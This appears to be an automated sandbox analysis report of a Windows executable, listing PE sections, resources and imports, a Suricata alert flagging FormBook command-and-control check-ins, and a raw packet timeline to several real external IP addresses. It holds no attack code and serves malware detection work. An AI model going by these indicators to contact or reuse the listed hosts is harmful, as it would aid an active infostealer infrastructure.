Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8b54f | 0x8b600 | f437a6545e938612764dbb0a314376fc | False | 0.5699499019058296 | data | 6.680413749210956 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8d000 | 0x2cc42 | 0x2ce00 | 827ffd24759e8e420890ecf164be989e | False | 0.330464397632312 | data | 5.770192333189168 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xba000 | 0x9d54 | 0x6200 | e0a519f8e3a35fae0d9c2cfd5a4bacfc | False | 0.16402264030612246 | data | 2.002691099965349 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xc4000 | 0x5de54 | 0x5e000 | 1ca665eaf0fd05480a3894b7fbe4b302 | False | 0.9297264586103723 | data | 7.8986657316669895 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x122000 | 0xa474 | 0xa600 | 0bc98f8631ef0bde830a7f83bb06ff08 | False | 0.5017884036144579 | data | 5.245426654116355 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Resources:
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xc45a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xc46d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xc47f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xc4920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0xc4c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
RT_ICON | 0xc4d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0xc5bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0xc6480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
RT_ICON | 0xc69e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0xc8f90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
RT_ICON | 0xca038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_MENU | 0xca4a0 | 0x50 | data | English | Great Britain | 0.9
RT_STRING | 0xca4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xcaa84 | 0x68a | data | English | Great Britain | 0.2747909199522103
RT_STRING | 0xcb110 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xcb5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xcbb9c | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xcc1f8 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xcc660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xcc7b8 | 0x55159 | data | | | 1.000332850317786
RT_GROUP_ICON | 0x121914 | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0x12198c | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x1219a0 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0x1219b4 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0x1219c8 | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x121aa4 | 0x3b0 | ASCII text, with CRLF line terminators | English | Great Britain | 0.5116525423728814
Imports (DLL: imported functions):
WSOCK32.dll: __WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
VERSION.dll: GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll: timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll: ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
MPR.dll: WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll: InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
PSAPI.DLL: GetProcessMemoryInfo
IPHLPAPI.DLL: IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll: UnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll: IsThemeActive
KERNEL32.dll: HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
USER32.dll: SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
GDI32.dll: SetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
COMDLG32.dll: GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll: GetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
SHELL32.dll: DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll: CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll: RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit
Language of compilation system | Country where language is spoken
English | Great Britain
Network IDS (Suricata) alerts:
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-20T21:09:18.080157+0100 | 2856318 | ETPRO MALWARE FormBook CnC Checkin (POST) M4 | 1 | 192.168.2.5 | 49793 | 134.0.14.158 | 80 | TCP
                                                            Nov 20, 2024 21:09:46.725544930 CET8049864185.27.134.206192.168.2.5
                                                            Nov 20, 2024 21:09:46.725676060 CET8049864185.27.134.206192.168.2.5
                                                            Nov 20, 2024 21:09:46.725729942 CET4986480192.168.2.5185.27.134.206
                                                            Nov 20, 2024 21:09:47.002017021 CET4986480192.168.2.5185.27.134.206
                                                            Nov 20, 2024 21:09:48.020589113 CET4987280192.168.2.5185.27.134.206
                                                            Nov 20, 2024 21:09:48.143692970 CET8049872185.27.134.206192.168.2.5
                                                            Nov 20, 2024 21:09:48.143912077 CET4987280192.168.2.5185.27.134.206
                                                            Nov 20, 2024 21:09:48.157494068 CET4987280192.168.2.5185.27.134.206
                                                            Nov 20, 2024 21:09:48.277725935 CET8049872185.27.134.206192.168.2.5
                                                            Nov 20, 2024 21:09:49.441334963 CET8049872185.27.134.206192.168.2.5
                                                            Nov 20, 2024 21:09:49.441622972 CET8049872185.27.134.206192.168.2.5
                                                            Nov 20, 2024 21:09:49.441694975 CET4987280192.168.2.5185.27.134.206
                                                            Nov 20, 2024 21:09:49.673989058 CET4987280192.168.2.5185.27.134.206
                                                            Nov 20, 2024 21:09:50.692974091 CET4987880192.168.2.5185.27.134.206
                                                            Nov 20, 2024 21:09:50.813019991 CET8049878185.27.134.206192.168.2.5
                                                            Nov 20, 2024 21:09:50.813252926 CET4987880192.168.2.5185.27.134.206
                                                            Nov 20, 2024 21:09:50.828082085 CET4987880192.168.2.5185.27.134.206
                                                            Nov 20, 2024 21:09:50.947951078 CET8049878185.27.134.206192.168.2.5
                                                            Nov 20, 2024 21:09:50.948343039 CET8049878185.27.134.206192.168.2.5
                                                            Nov 20, 2024 21:09:52.156817913 CET8049878185.27.134.206192.168.2.5
                                                            Nov 20, 2024 21:09:52.156831026 CET8049878185.27.134.206192.168.2.5
                                                            Nov 20, 2024 21:09:52.156902075 CET4987880192.168.2.5185.27.134.206
                                                            Nov 20, 2024 21:09:52.330528975 CET4987880192.168.2.5185.27.134.206
                                                            Nov 20, 2024 21:09:53.349910975 CET4988280192.168.2.5185.27.134.206
                                                            Nov 20, 2024 21:09:53.469712019 CET8049882185.27.134.206192.168.2.5
                                                            Nov 20, 2024 21:09:53.469860077 CET4988280192.168.2.5185.27.134.206
                                                            Nov 20, 2024 21:09:53.479079008 CET4988280192.168.2.5185.27.134.206
                                                            Nov 20, 2024 21:09:53.603178978 CET8049882185.27.134.206192.168.2.5
                                                            Nov 20, 2024 21:09:54.725383997 CET8049882185.27.134.206192.168.2.5
                                                            Nov 20, 2024 21:09:54.725578070 CET8049882185.27.134.206192.168.2.5
                                                            Nov 20, 2024 21:09:54.725649118 CET4988280192.168.2.5185.27.134.206
                                                            Nov 20, 2024 21:09:54.728315115 CET4988280192.168.2.5185.27.134.206
                                                            Nov 20, 2024 21:09:54.847798109 CET8049882185.27.134.206192.168.2.5
                                                            Nov 20, 2024 21:10:00.591939926 CET4989980192.168.2.5106.15.109.33
                                                            Nov 20, 2024 21:10:00.711524010 CET8049899106.15.109.33192.168.2.5
                                                            Nov 20, 2024 21:10:00.711637020 CET4989980192.168.2.5106.15.109.33
                                                            Nov 20, 2024 21:10:00.725912094 CET4989980192.168.2.5106.15.109.33
                                                            Nov 20, 2024 21:10:00.845474005 CET8049899106.15.109.33192.168.2.5
                                                            Nov 20, 2024 21:10:02.236413956 CET4989980192.168.2.5106.15.109.33
                                                            Nov 20, 2024 21:10:02.356267929 CET8049899106.15.109.33192.168.2.5
                                                            Nov 20, 2024 21:10:02.356355906 CET4989980192.168.2.5106.15.109.33
                                                            Nov 20, 2024 21:10:03.255213022 CET4990580192.168.2.5106.15.109.33
                                                            Nov 20, 2024 21:10:03.374907017 CET8049905106.15.109.33192.168.2.5
                                                            Nov 20, 2024 21:10:03.375171900 CET4990580192.168.2.5106.15.109.33
                                                            Nov 20, 2024 21:10:03.389355898 CET4990580192.168.2.5106.15.109.33
                                                            Nov 20, 2024 21:10:03.508985996 CET8049905106.15.109.33192.168.2.5
                                                            Nov 20, 2024 21:10:04.892827034 CET4990580192.168.2.5106.15.109.33
                                                            Nov 20, 2024 21:10:05.012904882 CET8049905106.15.109.33192.168.2.5
                                                            Nov 20, 2024 21:10:05.013066053 CET4990580192.168.2.5106.15.109.33
                                                            Nov 20, 2024 21:10:05.912861109 CET4991380192.168.2.5106.15.109.33
                                                            Nov 20, 2024 21:10:06.032916069 CET8049913106.15.109.33192.168.2.5
                                                            Nov 20, 2024 21:10:06.033025026 CET4991380192.168.2.5106.15.109.33
                                                            Nov 20, 2024 21:10:06.054174900 CET4991380192.168.2.5106.15.109.33
                                                            Nov 20, 2024 21:10:06.173851967 CET8049913106.15.109.33192.168.2.5
                                                            Nov 20, 2024 21:10:06.174092054 CET8049913106.15.109.33192.168.2.5
                                                            Nov 20, 2024 21:10:07.564764977 CET4991380192.168.2.5106.15.109.33
                                                            Nov 20, 2024 21:10:07.684983015 CET8049913106.15.109.33192.168.2.5
                                                            Nov 20, 2024 21:10:07.685033083 CET4991380192.168.2.5106.15.109.33
                                                            Nov 20, 2024 21:10:08.586325884 CET4992080192.168.2.5106.15.109.33
                                                            Nov 20, 2024 21:10:08.706018925 CET8049920106.15.109.33192.168.2.5
                                                            Nov 20, 2024 21:10:08.706108093 CET4992080192.168.2.5106.15.109.33
                                                            Nov 20, 2024 21:10:08.716196060 CET4992080192.168.2.5106.15.109.33
                                                            Nov 20, 2024 21:10:08.835690022 CET8049920106.15.109.33192.168.2.5
                                                            Nov 20, 2024 21:10:11.431771994 CET8049920106.15.109.33192.168.2.5
                                                            Nov 20, 2024 21:10:11.431813955 CET8049920106.15.109.33192.168.2.5
                                                            Nov 20, 2024 21:10:11.431827068 CET8049920106.15.109.33192.168.2.5
                                                            Nov 20, 2024 21:10:11.431871891 CET8049920106.15.109.33192.168.2.5
                                                            Nov 20, 2024 21:10:11.431885958 CET8049920106.15.109.33192.168.2.5
                                                            Nov 20, 2024 21:10:11.431896925 CET8049920106.15.109.33192.168.2.5
                                                            Nov 20, 2024 21:10:11.431909084 CET8049920106.15.109.33192.168.2.5
                                                            Nov 20, 2024 21:10:11.431962967 CET4992080192.168.2.5106.15.109.33
                                                            Nov 20, 2024 21:10:11.432009935 CET4992080192.168.2.5106.15.109.33
                                                            Nov 20, 2024 21:10:11.460197926 CET4992080192.168.2.5106.15.109.33
                                                            Nov 20, 2024 21:10:11.579804897 CET8049920106.15.109.33192.168.2.5
                                                            Nov 20, 2024 21:10:16.983781099 CET4993880192.168.2.545.141.156.114
                                                            Nov 20, 2024 21:10:17.104945898 CET804993845.141.156.114192.168.2.5
                                                            Nov 20, 2024 21:10:17.105063915 CET4993880192.168.2.545.141.156.114
                                                            Nov 20, 2024 21:10:17.119976044 CET4993880192.168.2.545.141.156.114
                                                            Nov 20, 2024 21:10:17.242368937 CET804993845.141.156.114192.168.2.5
                                                            Nov 20, 2024 21:10:18.516494989 CET804993845.141.156.114192.168.2.5
                                                            Nov 20, 2024 21:10:18.516948938 CET804993845.141.156.114192.168.2.5
                                                            Nov 20, 2024 21:10:18.517014027 CET4993880192.168.2.545.141.156.114
                                                            Nov 20, 2024 21:10:18.627063036 CET4993880192.168.2.545.141.156.114
                                                            Nov 20, 2024 21:10:19.648710966 CET4994580192.168.2.545.141.156.114
                                                            Nov 20, 2024 21:10:19.769891977 CET804994545.141.156.114192.168.2.5
                                                            Nov 20, 2024 21:10:19.770307064 CET4994580192.168.2.545.141.156.114
                                                            Nov 20, 2024 21:10:19.784112930 CET4994580192.168.2.545.141.156.114
                                                            Nov 20, 2024 21:10:19.903608084 CET804994545.141.156.114192.168.2.5
                                                            Nov 20, 2024 21:10:21.084203005 CET804994545.141.156.114192.168.2.5
                                                            Nov 20, 2024 21:10:21.084309101 CET804994545.141.156.114192.168.2.5
                                                            Nov 20, 2024 21:10:21.084482908 CET4994580192.168.2.545.141.156.114
                                                            Nov 20, 2024 21:10:21.298816919 CET4994580192.168.2.545.141.156.114
                                                            Nov 20, 2024 21:10:22.317893028 CET4995280192.168.2.545.141.156.114
                                                            Nov 20, 2024 21:10:22.443996906 CET804995245.141.156.114192.168.2.5
                                                            Nov 20, 2024 21:10:22.444133043 CET4995280192.168.2.545.141.156.114
                                                            Nov 20, 2024 21:10:22.459631920 CET4995280192.168.2.545.141.156.114
                                                            Nov 20, 2024 21:10:22.580857038 CET804995245.141.156.114192.168.2.5
                                                            Nov 20, 2024 21:10:22.580881119 CET804995245.141.156.114192.168.2.5
                                                            Nov 20, 2024 21:10:23.802182913 CET804995245.141.156.114192.168.2.5
                                                            Nov 20, 2024 21:10:23.802249908 CET804995245.141.156.114192.168.2.5
                                                            Nov 20, 2024 21:10:23.802371979 CET4995280192.168.2.545.141.156.114
                                                            Nov 20, 2024 21:10:23.970788002 CET4995280192.168.2.545.141.156.114
                                                            Nov 20, 2024 21:10:24.990597963 CET4995980192.168.2.545.141.156.114
                                                            Nov 20, 2024 21:10:25.110342026 CET804995945.141.156.114192.168.2.5
                                                            Nov 20, 2024 21:10:25.110431910 CET4995980192.168.2.545.141.156.114
                                                            Nov 20, 2024 21:10:25.119486094 CET4995980192.168.2.545.141.156.114
                                                            Nov 20, 2024 21:10:25.239628077 CET804995945.141.156.114192.168.2.5
                                                            Nov 20, 2024 21:10:26.470025063 CET804995945.141.156.114192.168.2.5
                                                            Nov 20, 2024 21:10:26.471107960 CET804995945.141.156.114192.168.2.5
                                                            Nov 20, 2024 21:10:26.471191883 CET4995980192.168.2.545.141.156.114
                                                            Nov 20, 2024 21:10:26.473028898 CET4995980192.168.2.545.141.156.114
                                                            Nov 20, 2024 21:10:26.596790075 CET804995945.141.156.114192.168.2.5
                                                            Nov 20, 2024 21:10:32.430073977 CET4997480192.168.2.5202.79.161.151
                                                            Nov 20, 2024 21:10:32.549705982 CET8049974202.79.161.151192.168.2.5
                                                            Nov 20, 2024 21:10:32.549834013 CET4997480192.168.2.5202.79.161.151
                                                            Nov 20, 2024 21:10:32.564551115 CET4997480192.168.2.5202.79.161.151
                                                            Nov 20, 2024 21:10:32.684164047 CET8049974202.79.161.151192.168.2.5
                                                            Nov 20, 2024 21:10:33.895478964 CET8049974202.79.161.151192.168.2.5
                                                            Nov 20, 2024 21:10:33.939450026 CET4997480192.168.2.5202.79.161.151
                                                            Nov 20, 2024 21:10:34.080195904 CET4997480192.168.2.5202.79.161.151
                                                            Nov 20, 2024 21:10:34.087848902 CET8049974202.79.161.151192.168.2.5
                                                            Nov 20, 2024 21:10:34.087932110 CET4997480192.168.2.5202.79.161.151
                                                            Nov 20, 2024 21:10:35.098440886 CET4998180192.168.2.5202.79.161.151
                                                            Nov 20, 2024 21:10:35.218300104 CET8049981202.79.161.151192.168.2.5
                                                            Nov 20, 2024 21:10:35.218436003 CET4998180192.168.2.5202.79.161.151
                                                            Nov 20, 2024 21:10:35.233187914 CET4998180192.168.2.5202.79.161.151
                                                            Nov 20, 2024 21:10:35.354226112 CET8049981202.79.161.151192.168.2.5
                                                            Nov 20, 2024 21:10:36.618599892 CET8049981202.79.161.151192.168.2.5
                                                            Nov 20, 2024 21:10:36.674019098 CET4998180192.168.2.5202.79.161.151
                                                            Nov 20, 2024 21:10:36.736605883 CET4998180192.168.2.5202.79.161.151
                                                            Nov 20, 2024 21:10:36.841474056 CET8049981202.79.161.151192.168.2.5
                                                            Nov 20, 2024 21:10:36.841626883 CET4998180192.168.2.5202.79.161.151
                                                            Nov 20, 2024 21:10:37.755419016 CET4998880192.168.2.5202.79.161.151
                                                            Nov 20, 2024 21:10:37.880790949 CET8049988202.79.161.151192.168.2.5
                                                            Nov 20, 2024 21:10:37.880872965 CET4998880192.168.2.5202.79.161.151
                                                            Nov 20, 2024 21:10:37.903876066 CET4998880192.168.2.5202.79.161.151
                                                            Nov 20, 2024 21:10:38.025155067 CET8049988202.79.161.151192.168.2.5
                                                            Nov 20, 2024 21:10:38.025353909 CET8049988202.79.161.151192.168.2.5
                                                            Nov 20, 2024 21:10:39.303628922 CET8049988202.79.161.151192.168.2.5
                                                            Nov 20, 2024 21:10:39.345771074 CET4998880192.168.2.5202.79.161.151
                                                            Nov 20, 2024 21:10:39.408272982 CET4998880192.168.2.5202.79.161.151
                                                            Nov 20, 2024 21:10:39.506194115 CET8049988202.79.161.151192.168.2.5
                                                            Nov 20, 2024 21:10:39.506361008 CET4998880192.168.2.5202.79.161.151
                                                            Nov 20, 2024 21:10:40.428179026 CET4999580192.168.2.5202.79.161.151
                                                            Nov 20, 2024 21:10:40.548038006 CET8049995202.79.161.151192.168.2.5
                                                            Nov 20, 2024 21:10:40.548170090 CET4999580192.168.2.5202.79.161.151
                                                            Nov 20, 2024 21:10:40.561042070 CET4999580192.168.2.5202.79.161.151
                                                            Nov 20, 2024 21:10:40.682413101 CET8049995202.79.161.151192.168.2.5
                                                            Nov 20, 2024 21:10:42.010817051 CET8049995202.79.161.151192.168.2.5
                                                            Nov 20, 2024 21:10:42.064416885 CET4999580192.168.2.5202.79.161.151
                                                            Nov 20, 2024 21:10:42.220601082 CET8049995202.79.161.151192.168.2.5
                                                            Nov 20, 2024 21:10:42.220741034 CET4999580192.168.2.5202.79.161.151
                                                            Nov 20, 2024 21:10:42.221574068 CET4999580192.168.2.5202.79.161.151
                                                            Nov 20, 2024 21:10:42.342642069 CET8049995202.79.161.151192.168.2.5
                                                            Nov 20, 2024 21:10:47.626879930 CET5000280192.168.2.5104.21.40.167
                                                            Nov 20, 2024 21:10:47.746406078 CET8050002104.21.40.167192.168.2.5
                                                            Nov 20, 2024 21:10:47.746534109 CET5000280192.168.2.5104.21.40.167
                                                            Nov 20, 2024 21:10:47.760278940 CET5000280192.168.2.5104.21.40.167
                                                            Nov 20, 2024 21:10:47.879970074 CET8050002104.21.40.167192.168.2.5
                                                            Nov 20, 2024 21:10:49.267611980 CET5000280192.168.2.5104.21.40.167
                                                            Nov 20, 2024 21:10:49.403639078 CET8050002104.21.40.167192.168.2.5
                                                            Nov 20, 2024 21:10:49.403712988 CET5000280192.168.2.5104.21.40.167
                                                            Nov 20, 2024 21:10:50.286459923 CET5000380192.168.2.5104.21.40.167
                                                            Nov 20, 2024 21:10:50.406147957 CET8050003104.21.40.167192.168.2.5
                                                            Nov 20, 2024 21:10:50.406368017 CET5000380192.168.2.5104.21.40.167
                                                            Nov 20, 2024 21:10:50.420706987 CET5000380192.168.2.5104.21.40.167
                                                            Nov 20, 2024 21:10:50.541374922 CET8050003104.21.40.167192.168.2.5
                                                            Nov 20, 2024 21:10:51.923863888 CET5000380192.168.2.5104.21.40.167
                                                            Nov 20, 2024 21:10:52.044152975 CET8050003104.21.40.167192.168.2.5
                                                            Nov 20, 2024 21:10:52.044397116 CET5000380192.168.2.5104.21.40.167
                                                            Nov 20, 2024 21:10:52.943306923 CET5000480192.168.2.5104.21.40.167
                                                            Nov 20, 2024 21:10:53.063004971 CET8050004104.21.40.167192.168.2.5
                                                            Nov 20, 2024 21:10:53.063107967 CET5000480192.168.2.5104.21.40.167
                                                            Nov 20, 2024 21:10:53.078188896 CET5000480192.168.2.5104.21.40.167
                                                            Nov 20, 2024 21:10:53.198834896 CET8050004104.21.40.167192.168.2.5
                                                            Nov 20, 2024 21:10:53.199014902 CET8050004104.21.40.167192.168.2.5
